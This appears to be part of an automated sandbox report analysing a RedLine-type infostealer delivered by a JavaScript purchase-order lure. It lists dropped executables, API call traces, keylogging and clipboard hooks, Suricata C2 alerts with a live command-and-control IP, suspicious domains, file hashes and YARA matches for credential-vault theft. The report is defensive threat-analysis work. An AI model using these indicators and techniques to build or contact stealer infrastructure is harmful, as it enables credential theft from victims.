                                Source: Binary string: wntdll.pdb source: x.exe, 00000002.00000003.1530923482.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.1530355162.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565181805.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565707457.0000000005050000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600560631.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600415328.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640373275.0000000004030000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640053185.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1680596257.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1679446140.00000000039A0000.00000004.00001000.00020000.00000000.sdmp
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00452492
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00442886
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_004788BD
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,2_2_004339B6
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,2_2_0045CAFA
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00431A86
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,2_2_0044BD27
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0045DE8F FindFirstFileW,FindClose,2_2_0045DE8F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0044BF8B
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_00452492
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00442886
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,4_2_004788BD
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,4_2_004339B6
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,4_2_0045CAFA
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00431A86
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,4_2_0044BD27
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0045DE8F FindFirstFileW,FindClose,4_2_0045DE8F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0044BF8B
                                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

                                Software Vulnerabilities

                                barindex
                                Suspicious execution chain found
                                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 032078DCh17_2_03207642
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_03207E60
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 032078DCh17_2_0320767A
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_03207E58

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.8:62827 -> 212.162.149.53:2049
                                Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.8:62827 -> 212.162.149.53:2049
                                Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 212.162.149.53:2049 -> 192.168.2.8:62827
                                Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 212.162.149.53:2049 -> 192.168.2.8:62827
                                C2 URLs / IPs found in malware configuration
                                Source: Malware configuration extractorURLs: 212.162.149.53:2049
                                Source: global trafficTCP traffic: 192.168.2.8:62827 -> 212.162.149.53:2049
                                Source: global trafficTCP traffic: 192.168.2.8:62828 -> 51.195.88.199:587
                                Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                                Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                                Source: Joe Sandbox ViewIP Address: 51.195.88.199 51.195.88.199
                                Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                                Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: unknownDNS query: name: api.ipify.org
                                Source: unknownDNS query: name: api.ipify.org
                                Source: global trafficTCP traffic: 192.168.2.8:62828 -> 51.195.88.199:587
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004422FE InternetQueryDataAvailable,InternetReadFile,2_2_004422FE
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                                Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                                Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                                Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                                Source: unknownNetwork traffic detected: HTTP traffic on port 62826 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62826
                                Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:62826 version: TLS 1.2

                                Key, Mouse, Clipboard, Microphone and Screen Capturing

                                barindex
                                Contains functionality to log keystrokes (.Net Source)
                                Source: neworigin.exe.16.dr, cPKWk.cs.Net Code: I3Mi2zn6x
                                Source: 16.2.svchost.exe.314b000.1.raw.unpack, cPKWk.cs.Net Code: I3Mi2zn6x
                                Installs a global keyboard hook
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0045A10F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0045A10F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_0045A10F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,2_2_0046DC80
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,2_2_0044C37A
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow created: window name: CLIPBRDWNDCLASS
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow created: window name: CLIPBRDWNDCLASS
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0047C81C
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,4_2_0047C81C

                                System Summary

                                barindex
                                Malicious sample detected (through community Yara rule)
                                Source: 16.2.svchost.exe.314b000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                Source: 16.2.svchost.exe.3112000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                Source: 16.2.svchost.exe.314b000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                Source: 18.0.neworigin.exe.e60000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                Source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                .NET source code contains very large strings
                                Source: server_BTC.exe.16.dr, opqcmgIPmeabY.csLong String: Length: 17605
                                Source: 16.2.svchost.exe.3112000.3.raw.unpack, opqcmgIPmeabY.csLong String: Length: 17605
                                Source: TrojanAIbot.exe.17.dr, opqcmgIPmeabY.csLong String: Length: 17605
                                JavaScript file contains suspicious strings
                                Source: RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsInitial file: wscript.shell, adodb.stream, wmic
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,2_2_00431BE8
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_00446313
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,2_2_004333BE
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,4_2_004333BE
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004096A02_2_004096A0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0042200C2_2_0042200C
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0041A2172_2_0041A217
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004122162_2_00412216
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0042435D2_2_0042435D
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004033C02_2_004033C0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044F4302_2_0044F430
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004125E82_2_004125E8
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044663B2_2_0044663B
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004138012_2_00413801
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0042096F2_2_0042096F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004129D02_2_004129D0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004119E32_2_004119E3
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0041C9AE2_2_0041C9AE
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0047EA6F2_2_0047EA6F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0040FA102_2_0040FA10
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044EB5F2_2_0044EB5F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00423C812_2_00423C81
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00411E782_2_00411E78
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00442E0C2_2_00442E0C
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00420EC02_2_00420EC0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044CF172_2_0044CF17
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00444FD22_2_00444FD2
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_047394002_2_04739400
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004096A04_2_004096A0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0042200C4_2_0042200C
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0041A2174_2_0041A217
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004122164_2_00412216
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0042435D4_2_0042435D
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004033C04_2_004033C0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0044F4304_2_0044F430
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004125E84_2_004125E8
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0044663B4_2_0044663B
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004138014_2_00413801
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0042096F4_2_0042096F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004129D04_2_004129D0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004119E34_2_004119E3
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0041C9AE4_2_0041C9AE
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0047EA6F4_2_0047EA6F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0040FA104_2_0040FA10
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0044EB5F4_2_0044EB5F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00423C814_2_00423C81
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00411E784_2_00411E78
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00442E0C4_2_00442E0C
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00420EC04_2_00420EC0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0044CF174_2_0044CF17
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00444FD24_2_00444FD2
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_04845CB04_2_04845CB0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_049376286_2_04937628
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 9_2_04B5C6289_2_04B5C628
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 13_2_04B5B62813_2_04B5B628
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 15_2_049A962815_2_049A9628
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F751EE16_2_00F751EE
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FB39A316_2_00FB39A3
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F76EAF16_2_00F76EAF
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FA598016_2_00FA5980
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FB515C16_2_00FB515C
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FAD58016_2_00FAD580
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FAC7F016_2_00FAC7F0
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F77F8016_2_00F77F80
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FA378016_2_00FA3780
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 17_2_032085B717_2_032085B7
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 17_2_032085C817_2_032085C8
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_030DDC7419_2_030DDC74
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058EEE5819_2_058EEE58
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058E885019_2_058E8850
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058E0AFC19_2_058E0AFC
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058E000619_2_058E0006
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058E004019_2_058E0040
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058E884019_2_058E8840
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058E0AF919_2_058E0AF9
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058E1FF019_2_058E1FF0
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0299B08820_2_0299B088
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0299B07820_2_0299B078
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_082D3E9820_2_082D3E98
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\build.exe 0576191C50A1B6AFBCAA5CB0512DF5B6A8B9BEF9739E5308F8E2E965BF9B0FC5
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\neworigin.exe DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 0040E710 appears 44 times
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 00401B10 appears 50 times
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 00408F40 appears 38 times
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 004301F8 appears 36 times
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 004115D7 appears 72 times
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 00416C70 appears 78 times
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 004181F2 appears 42 times
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 00445AE0 appears 130 times
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 0041341F appears 36 times
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 00422240 appears 38 times
                                Source: RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsInitial sample: Strings found which are bigger than 50
                                Source: 16.2.svchost.exe.314b000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                Source: 16.2.svchost.exe.3112000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                Source: 16.2.svchost.exe.314b000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
